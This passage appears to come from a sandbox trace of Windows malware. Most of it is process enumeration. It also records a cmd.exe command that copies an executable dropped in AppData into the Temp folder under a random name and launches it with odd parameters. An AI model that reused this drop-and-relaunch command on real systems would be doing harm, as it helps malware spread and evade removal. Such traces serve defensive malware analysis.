cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.099] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.100] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: 
lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.101] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.102] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.104] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.105] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.106] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.107] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.108] Process32NextW (in: hSnapshot=0xf8, 
lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0112.109] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0112.110] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xcb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.111] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.112] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xcc0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.113] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.114] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xcec, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0112.115] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: 
lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.116] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.117] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.118] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.119] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 1 [0112.120] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 0 [0112.121] CloseHandle (hObject=0xf8) returned 1 [0112.121] GetTickCount () returned 0x26d91 [0112.121] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16891009840) returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | 
out: lpWideCharStr="h") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0112.121] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x125bfcc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0112.121] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0112.121] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0112.121] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", 
lpszShortPath=0x125bfcc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0112.122] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0112.122] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0112.122] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\HVGO9CKX.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\HVGO9CKX.EXE\" [PARAMS]") returned 0xb1 [0112.122] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0112.122] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xf8, dwProcessId=0xd68, dwThreadId=0xd6c)) returned 1 [0112.123] CloseHandle (hObject=0xf0) returned 1 [0112.123] CloseHandle (hObject=0xf8) returned 1 [0112.123] Sleep (dwMilliseconds=0xfa) [0112.425] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf4 [0112.430] Process32FirstW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.431] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.431] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.432] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.433] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.434] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.434] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.435] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.436] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.437] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.438] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.439] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.440] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.441] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.441] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.442] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.443] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.444] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.446] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.447] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.449] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.450] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.451] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.452] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.454] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.455] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.456] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.457] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.458] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.460] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.461] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.462] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.463] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.465] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.466] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.467] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.468] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.635] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.636] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.637] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.638] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.639] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.640] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.641] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.642] Process32NextW (in: 